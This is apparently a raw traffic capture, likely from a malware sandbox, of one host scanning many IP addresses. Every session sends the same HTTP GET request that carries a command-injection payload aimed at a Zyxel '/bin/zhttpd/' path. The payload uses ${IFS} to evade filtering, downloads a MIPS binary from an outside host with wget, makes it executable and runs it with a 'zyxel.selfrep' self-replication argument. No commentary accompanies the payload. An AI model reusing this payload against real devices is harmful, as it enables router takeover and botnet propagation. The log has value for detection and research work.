                                            Feb 2, 2024 06:21:28.957784891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8521192.168.2.154519261.2.133.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957851887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8522192.168.2.1549904155.250.51.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957865953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8523192.168.2.1540192125.183.9.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957912922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8524192.168.2.153606459.253.89.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.957962036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8525192.168.2.1553458206.20.155.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958002090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8526192.168.2.155369441.220.113.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958041906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8527192.168.2.1541114152.22.89.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958100080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8528192.168.2.1558660217.22.115.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958175898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8529192.168.2.1555950112.9.181.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958193064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8530192.168.2.1545344201.90.111.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958240032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8531192.168.2.1559766120.2.83.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958281040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8532192.168.2.1552764114.83.212.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958358049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8533192.168.2.1548766175.87.182.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958374023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8534192.168.2.155631497.214.64.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958404064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8535192.168.2.153563094.169.224.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958467007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8536192.168.2.153743643.83.151.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958499908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8537192.168.2.153995012.249.252.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958564043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8538192.168.2.1560530199.112.67.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958632946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8539192.168.2.155208095.24.179.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958632946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8540192.168.2.153580078.62.194.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958653927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8541192.168.2.154369272.45.225.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958709955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8542192.168.2.155928638.172.95.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958709955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8543192.168.2.1533990206.210.229.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958758116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8544192.168.2.1554496173.138.1.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958808899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8545192.168.2.1552888163.177.91.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958851099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8546192.168.2.1543402191.81.226.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958892107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8547192.168.2.155610041.238.212.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958930969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8548192.168.2.155340661.135.62.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.958961010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8549192.168.2.156056677.87.199.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959012032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8550192.168.2.1541294171.161.124.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959033012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8551192.168.2.1535756132.116.245.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959075928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8552192.168.2.155976831.22.78.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959146023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8553192.168.2.1550262188.52.216.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959198952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8554192.168.2.154338884.55.24.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959218979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8555192.168.2.1552726108.144.71.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959284067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8556192.168.2.154413475.192.140.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959321022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8557192.168.2.1540914120.90.50.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959378004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8558192.168.2.1548790172.96.143.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959424019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8559192.168.2.1548868114.82.26.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959445000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8560192.168.2.153597024.127.104.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959480047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8561192.168.2.1533792185.217.251.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959525108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8562192.168.2.1544454101.161.49.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959568024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8563192.168.2.1560808211.68.179.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959635973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8564192.168.2.155705448.166.159.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959666967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8565192.168.2.155880854.35.3.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959734917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8566192.168.2.1557292141.183.143.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959758997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8567192.168.2.1541742135.234.183.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959810972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8568192.168.2.1558312182.53.30.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959850073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8569192.168.2.1556934196.17.75.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959897041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8570192.168.2.153929253.207.207.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959954977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8571192.168.2.1546104206.59.231.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.959989071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8572192.168.2.154194461.230.70.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960005045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8573192.168.2.155204285.166.30.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960052013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8574192.168.2.154157232.190.190.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960073948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8575192.168.2.1553056209.109.210.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960141897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8576192.168.2.1536210187.118.107.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960154057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8577192.168.2.1550190118.136.79.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960191965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8578192.168.2.154822278.27.204.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960248947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8579192.168.2.1559404175.40.67.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960310936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8580192.168.2.1540628141.253.94.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960320950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8581192.168.2.1540758130.67.60.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960375071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8582192.168.2.153944819.191.143.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960403919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8583192.168.2.1559458200.6.2.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.960438013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8584192.168.2.1558498198.181.95.154443
                                            TimestampBytes transferredDirectionData
